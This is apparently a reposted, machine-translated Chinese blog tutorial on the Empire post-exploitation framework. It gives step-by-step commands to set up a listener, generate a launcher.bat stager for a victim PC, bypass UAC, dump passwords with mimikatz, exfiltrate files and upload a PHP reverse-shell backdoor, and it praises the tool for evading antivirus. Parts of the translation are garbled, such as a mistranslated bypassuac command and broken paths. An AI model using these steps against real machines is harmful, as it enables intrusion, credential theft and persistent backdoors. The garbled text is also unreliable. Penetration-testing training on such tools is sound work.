• Empire基本使用方法


    安装

    您可以从此处下载Empire 。从为GitHub提供的超链接中克隆命令,或者直接使用google。

    使用以下命令下载它:

    1

    git clone https://github.com/EmpireProject/Empire.git

    启动并完成下载后,请按照下面直接给出的步骤进行安装:

    cd Empire/

    ls

    cd setup/

    ls

    ./install.sh

    等待它完成安装。这可能需要几秒钟。它将提示您输入密码。

    就我而言,我的密码是toor。

    安装完成后,移回目录并使用./empire运行empire

    现在使用“ 帮助”命令,因为它打开了最初需要的所有基本选项。

    根据工作流程,首先,我们必须在本地计算机上创建一个侦听器。键入以下命令:

    listeners

    运行上面的命令后,它将说“当前没有侦听器处于活动状态”,但是不用担心,我们现在进入侦听器界面。因此,在此侦听器界面中,输入:

    uselistener <tab> <tab>

    上面的命令将列出一个人可以使用的所有侦听器,例如dbx,http,http_com等。最受欢迎和最常用的侦听器是http,我们将在实践中使用相同的侦听器。对于该类型:

    uselistener http

    此命令会在本地端口80上创建一个侦听器。如果Apache之类的服务已经在端口80上忙了,请确保停止该服务,因为此HTTP侦听器仅在端口80上起作用。现在查看所有设置您应该提供以下侦听器类型:

    info

    正如您在图像中看到的,可以使用多种设置来修改或自定义侦听器。让我们尝试更改监听器的名称,因为它有助于记住所有已激活的监听器。如果批量激活。因此,请输入:

    set Name test

    上面的命令会将侦听器的名称从http更改为test。

    通常,此侦听器会自动占用本地主机IP,但是以防万一,您可以使用以下命令来设置IP:

    set Host //192.168.1.107

    execute

    上面的命令将执行监听器。然后返回并使用PowerShell监听器,如图所示。

    现在键入“ back”从侦听器界面返回,以便我们可以执行模块。使用以下命令查看帝国提供的所有模块:

    usestager <tabt> <tab>

    如下图所示,有许多用于Windows和IOS的模块,以及可以在任何平台上使用的多个模块。在我们的教程中,我们将使用launcher_bat创建恶意软件并利用受害者的PC。对于这种类型:

    usestager windows/launcher_bat

    然后再次键入“ info”以查看漏洞利用程序所需的所有设置。检查后,您将看到我们仅需要提供侦听器。因此,键入:

    set Listener test

    execute

    设置侦听器测试并创建/tmp/launcher.bat之后,以上两个命令将执行我们的利用。使用python服务器在受害者的PC中执行此文件。文件执行后,您将拥有一个会话。要检查您的会话类型:

    agents

    使用以上命令,您可以看到已激活会话。您可以更改会话的名称,因为默认情况下提供的名称非常复杂且难以记住。为此,请输入:

    rename ZAF3GT5W raajpc

    使用以下内容访问会话:

    interact raajpc

    获得对会话的访问权限后,请尝试使用以下命令来获取管理会话:

    旁路http

    执行bypassuac命令后,将打开另一个会话。通过输入以下命令重命名该会话:

    rename HE3K45LN adminraj

    让我们

    interact with adminraj now.

    interact adminraj

    <tab> <tab>帮助我们查看Shell中的所有选项。有几个选项对于后期开发非常有帮助。如图所示,例如信息,工作,列表等。

    信息: 有关IP,随机数,抖动,完整性等所有基本信息。

    现在,如果您使用“帮助”命令,您将能够看到所有可执行命令。

    让我们尝试运行  mimikatz  来获取用户的密码。由于  mimikatz  不能在普通的来宾用户shell上运行,而只能在admin shell上运行;这也证明我们必须获得管理员访问权限才能使用mimikatz。

    嗯!用户raj的密码为“ 123”。

    信誉

    上面的命令将以明文和哈希值的形式转储任何用户的凭据或密码。

    另一个重要的命令是  shell 命令。

    要使用受害者的外壳运行正确的Microsoft Windows命令,我们使用此功能。

    例如:一个这样的窗口的仅cmd命令是  netstat

    shell netstat -ano

    正如预期的那样,以上命令向我们显示了机器上当前正在使用的所有端口!

    现在,由于Windows中的默认shell目录为“ C:/ windows / system32 ”;让我们尝试移至另一个目录并尝试从该目录下载一些文件,并且我们可以在该位置上载一些内容,例如,我们可以上载后门!现在,使用以下命令:

    shell cd C:Users ajDesktop

    shell dir

    download 6.png

    上面的命令将从窗口桌面将名为6.png的图像下载到“ Empires的下载目录”

    upload /root/Desktop/revshell.php

    在这里,我们可以上传任何后门,借助上述命令,我们可以从Kali的桌面向受害人的桌面上传php后门,并且由于我们具有shell访问权限,因此甚至可以调用此文件!

    这是下载的文件所在的位置:

    帝国目录/下载/ <代理名称> / <代理外壳位置>

    shell dir

    上面的命令证明我们确实已经上传了revshell.php

    在那里!受害机器的桌面上的Revshell.php是我们的后门文件。

    先前显示的是帝国的基本演示及其使用的不同术语以及如何使用它们。也有另一个术语,即usemodule。最后,让我们看看如何使用它。

    usemodule <tab> <tab>

    该命令将向您显示所有可用并准备使用的模块,如下图所示:

    以下是有关如何使用usemodule的小演示。类型:

    usemodule trollsploit/message

    set MsgText you have been hacked

    execute

    y

    使用以上模块将在受害者的PC上显示一条消息,如下图所示:

    结论

    .exe / dll / hta等形式的恶意软件使攻击者可以构造任何期望的攻击,因为此框架可以访问Win32。尽管反病毒公司正日益意识到这一点,但它们仍然有效。由于其大量,真实和有效的漏洞利用后收集,它是一个很好的工具。最终,目标是在攻击中未被发现并成功,并且此工具使我们能够做到这一点。本文涵盖了您需要了解的有关该框架的所有基础知识。

  • 相关阅读:
    分享
    慕课网-软件测试基础-学习笔记
    向量内积(点乘)和外积(叉乘)概念及几何意义
    使用opencv3+python实现视频运动目标检测
    解决opencv3运行opencv2代码时报错的修改备忘录
    分享
    OpenCV学习笔记
    LeetCode
    LeetCode
    npm安装包很慢
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13724095.html
Copyright © 2020-2023  润新知